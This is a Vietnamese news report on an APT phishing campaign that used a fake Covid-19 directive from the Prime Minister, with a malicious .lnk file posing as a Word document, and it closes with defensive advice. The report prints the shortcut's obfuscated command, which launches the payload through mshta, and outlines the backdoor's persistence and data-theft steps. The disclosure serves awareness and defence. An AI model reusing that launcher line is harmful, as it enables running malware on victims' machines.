Trong thời gian gần đây, do diễn biến của dịch Covid-19 khá phức tạp, nhiều nhóm tin tặc đã lợi dụng để thực hiện các chiến dịch tấn công có chủ đích nhằm vào các tổ chức trên thế giới, trong đó có cả ở Việt Nam.
Mục tiêu của tệp tin độc hại
Theo báo cáo phân tích của CMC Cyber Security, mẫu mã độc mới này được phát tán qua email giả dạng thông báo của Thủ tướng về dịch Covid-19. Mẫu mã độc được phát hiện giống với một số mẫu do nhóm tin tặc Panda phát triển, chèn trong một tệp tin word có tiêu đề “Chi Thi cua Thu tuong nguyen xuan phuc”. Tệp tin có dạng shortcut với phần mở rộng là “.lnk” được ẩn dưới dạng winword nhằm đánh lừa người dùng, do đuôi “.lnk” sẽ được hệ điều hành Windows ẩn đi.
Tuy nhiên, tệp tin winword này sử dụng một mục tiêu đáng ngờ. Thông thường, mục tiêu của shorcut thường trỏ đến một thư mục hoặc file đích, nhưng tệp tin độc hại này lại chứa đoạn mã lệnh có dạng: “%comspec% /c for %x in (%temp%=%cd%) do for /f “delims==” %i in (‘dir “%x\Chi Thi cua thu tuong nguyen xuan phuc.lnk” /s /b’) do start m%windir:~-1,1%hta.exe “%i”.
Qua phân tích, các chuyên gia CMC Cyber Security cho biết, sau khi lừa người dùng tải về, mã độc sẽ lần lượt thực hiện các bước:
Bước 1: Tạo bản sao của 3 tệp tin thực thi vào thư mục profile của user hoặc AllUserProfile nếu có đủ quyền Administrator.
Bước 2: Thêm vào khóa autorun để tự kích hoạt tệp tin thực thi vừa tạo khi khởi động lại máy tính.
Bước 3: Mã độc tạo mutex, kết nối đến máy chủ để nhận lệnh.
Bước 4: Mã độc tạo cửa hậu cho phép kẻ tấn công thực thi lệnh từ xa. Khi đó, mã độc có thể thực hiện nhiều lệnh thực thi khác nhau, bao gồm: upload, list folder, read file, lấy cắp thông tin máy tính, người dùng…
“Bằng cách sử dụng nhiều kỹ thuật tấn công khác nhau và làm rối trong khi thực thi cho thấy rằng, người đứng sau phát triển mã độc này đã đầu tư không ít thời gian để nghiên cứu mục tiêu và phát triển phương pháp tấn công cho phù hợp. APT là một loại tấn công nguy hiểm, được đầu tư kỹ lưỡng nhằm đánh cắp các thông tin quan trọng và gây nhiều thiệt hại cho tổ chức. Để phòng ngừa các cuộc tấn công APT, người dùng luôn phải chuẩn bị các phương án đề phòng và giám sát liên tục mới có thể đảm bảo tính an toàn cho hệ thống của người dùng cũng như cả tổ chức”, chuyên gia bảo mật CMC Cyber Security nhấn mạnh.
Để không bị hacker lừa phát tán mã độc trong bối cảnh tin giả về dịch Covid-19 đang xuất hiện tràn lan trên mạng như hiện nay, người dùng cần nâng cao cảnh giác, chỉ đọc các thông tin từ nguồn chính thống của Bộ Y tế, Chính phủ; không mở email hay click vào link lạ; không mở các file được gửi từ nguồn không rõ ràng; thường xuyên cập nhật các bản vá bảo mật cho thiết bị cá nhân và không chia sẻ các thông tin không chính thống trên mạng xã hội.
Trường hợp bắt buộc phải tải tệp tin về nhưng phát hiện nghi ngờ về nội dung hoặc người gửi, người dùng cần chuyển tiếp email đó vào một email tạm thời khác và dùng một máy tính tách biệt với mạng đang làm việc để mở file, hoặc chuyển tiếp cho quản trị hệ thống. Nếu nắm sâu về kĩ thuật hơn nữa thì có thể thử mở các file nghi ngờ tại các môi trường an toàn hơn (như máy ảo).
Tuệ Minh
10:00 | 19/02/2020
15:00 | 23/03/2020
09:00 | 23/03/2020
09:00 | 12/11/2021
10:00 | 27/03/2020
09:00 | 25/03/2020
14:00 | 10/02/2020
13:00 | 23/11/2020
13:00 | 03/02/2020
08:00 | 26/03/2020
16:00 | 27/03/2020
10:00 | 14/04/2020
16:00 | 24/12/2024
Theo ghi nhận của Trung tâm dữ liệu Thành phố Hồ Chí Minh, đã có 57.586.971 sự kiện mất an toàn thông tin trong 9 tháng đầu năm 2024. Trong đó hầu hết các vụ tấn công nhằm thu thập thông tin.
10:00 | 24/12/2024
Ủy ban châu Âu đã vào cuộc điều tra TikTok với cáo buộc vi phạm luật Dịch vụ kỹ thuật số (DSA), có thể ảnh hưởng đến hoạt động của nền tảng này tại châu Âu.
09:00 | 13/12/2024
Cục An toàn thông tin (Bộ TT&TT) vừa cảnh báo phương thức lừa đảo mới thông qua nền tảng Dropbox được các đối tượng xấu sử dụng nhằm đánh cắp thông tin và dữ liệu từ tài khoản Microsoft của người dùng.
17:00 | 20/11/2024
Sáng 20/11, tại Hà Nội, Học viện Kỹ thuật mật mã, Ban Cơ yếu Chính phủ đã long trọng tổ chức Lễ kỷ niệm 42 năm ngày Nhà giáo Việt Nam (20/11/1982 - 20/11/2024) và 20 năm đào tạo ngành An toàn thông tin. Thiếu tướng Nguyễn Hữu Hùng, Phó Trưởng ban Ban Cơ yếu Chính phủ tới dự và phát biểu chúc mừng.
Chatbot AI DeepSeek đang tạo ra làn sóng chấn động trên Phố Wall và ảnh hưởng mạnh mẽ đến Nvidia, khiến cổ phiếu công ty này bốc hơi 600 tỷ USD chỉ trong một ngày. Không chỉ có vậy, DeepSeek cũng đã vượt qua chatbot AI ChatGPT để vươn lên dẫn đầu trên App Store về danh mục ứng dụng miễn phí. Sự phát triển nhanh chóng mặt này đã khiến các công ty trí tuệ nhân tạo (AI) cũng như các chính phủ phương Tây và Cơ quan Hàng không Vũ trụ Mỹ (NASA) phải lên tiếng cảnh báo.
13:00 | 14/02/2025
Khép lại năm 2024, Lãnh đạo Ban Cơ yếu Chính phủ, cấp ủy, lãnh đạo các cấp trong toàn lực lượng cơ yếu, nhất là đội ngũ cán bộ chủ chốt đã chủ động bám sát yêu cầu nhiệm vụ và thực tiễn, cùng với sự nỗ lực rất lớn của toàn thể cán bộ, nhân viên ngành Cơ yếu Việt Nam tổ chức triển khai đồng bộ, toàn diện trên các mặt công tác, hoàn thành tốt nhiệm vụ được giao, trong đó có nhiều nhiệm vụ hoàn thành xuất sắc, tiếp tục khẳng định vị thế, vai trò đặc biệt quan trọng của hoạt động cơ yếu. Dưới đây là 10 dấu ấn nổi bật trong năm 2024 của ngành Cơ yếu Việt Nam.
08:00 | 29/01/2025
Hãng công nghệ Google thông báo sẽ phát hành các ứng dụng điện toán lượng tử thương mại trong vòng 5 năm tới. Động thái này được xem là lời thách thức trực tiếp tới những dự đoán thận trọng hơn từ Nvidia, vốn cho rằng phải mất tới 20 năm nữa công nghệ này mới thực sự hữu dụng.
13:00 | 14/02/2025